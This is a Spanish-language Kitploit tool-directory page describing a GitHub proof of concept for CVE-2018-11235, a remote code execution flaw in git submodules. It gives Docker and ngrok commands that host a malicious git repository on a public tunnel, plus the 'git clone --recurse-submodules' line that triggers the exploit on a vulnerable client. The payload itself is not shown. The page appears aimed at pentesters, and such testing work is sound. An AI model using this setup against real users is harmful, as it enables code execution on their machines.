Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration — CVE-2018-11235-Git-Submodule-CE + Configuración de Docker Ngrok | Kitploit
Herramientas/GitHubGitHub/twseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubtwseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration

cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration

CVE-2018-11235-Git-Submodule-CE + Configuración de Docker Ngrok

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 4 añosAún no revisado

CVE-2018-11235-Git-Submodule-CE + Configuración de Docker Ngrok

CVE-2018-11235-Git PoC y tunelización con docker ngrok

Construir Dockerfile

root@kitploit:~
$ docker build -t cve-2018-11235 .

Crear red personalizada para ngrok

root@kitploit:~
$ docker network create myngroknet

Iniciar Servidor Git Http

root@kitploit:~
$ docker run -d -p 8080:80 --net myngroknet --name cve-2018-11235 cve-2018-11235

Iniciar Servidor Ngrok HTTP para el Servidor Git

root@kitploit:~
$ docker run -d -p 4040:4040 --net myngroknet --name ngrok wernight/ngrok ngrok http cve-2018-11235:80 --authtoken PUT_YOUR_NGROK_AUTHTOKEN

Ahora puedes acceder a la API para encontrar el dominio asignado:

root@kitploit:~
$ curl $(docker port www_ngrok 4040)/api/tunnels
{"tunnels":[{"name":"command_line","uri":"/api/tunnels/command_line","public_url":"https://f5fc-116-206-35-27.ngrok.io","proto":"https","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}},{"name":"command_line (http)","uri":"/api/tunnels/command_line%20%28http%29","public_url":"http://f5fc-116-206-35-27.ngrok.io","proto":"http","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}}],"uri":"/api/tunnels"}

PoC en Servidor Git Vulnerable

root@kitploit:~
$ git clone --recurse-submodules http://f5fc-116-206-35-27.ngrok.io/malicious.git

Referencias:

  • CVE-2018-11235 git RCE
  • CVE-2018-11235-Git-Submodule-CE
  • Expose Docker Container services on the Internet using the ngrok docker image
  • wernight/ngrok
  • CVE-2018-11235 - Quick & Dirty PoC
Descargar herramienta